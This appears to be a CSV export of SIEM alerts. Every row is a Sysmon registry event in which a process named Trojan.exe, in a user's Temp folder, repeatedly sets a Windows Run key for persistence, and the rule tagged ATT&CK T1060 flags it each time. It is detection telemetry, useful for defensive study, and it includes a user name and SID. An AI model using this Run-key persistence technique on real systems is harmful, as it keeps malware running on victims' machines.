HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:43.095"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:21:55.192",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:42.080 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:42.083683300Z"",""eventRecordID"":""1421"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:42.080\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:24:42.080"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:54.192",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:41.065 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:41.066677800Z"",""eventRecordID"":""1420"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:41.065\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:41.065"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:53.178",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:40.049 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:40.051225700Z"",""eventRecordID"":""1419"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:40.049\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:40.049"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:21:52.363",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:39.034 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:39.035504200Z"",""eventRecordID"":""1418"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:39.034\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:24:39.034"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:52.286",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:38.017 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:38.020685200Z"",""eventRecordID"":""1415"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:38.017\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:38.017"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:52.179",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:37.002 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:37.013873700Z"",""eventRecordID"":""1414"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:37.002\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:37.002"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:21:49.113",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:35.971 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:35.973204800Z"",""eventRecordID"":""1412"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:35.971\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:24:35.971"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:48.100",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:34.955 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:34.956908100Z"",""eventRecordID"":""1410"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:34.955\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:34.955"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:47.067",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:33.940 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:33.955289500Z"",""eventRecordID"":""1408"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:33.940\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:33.940"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:21:46.070",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:32.908 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:32.912986200Z"",""eventRecordID"":""1406"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:32.908\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:24:32.908"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:44.099",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:31.893 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:31.907245900Z"",""eventRecordID"":""1405"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:31.893\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
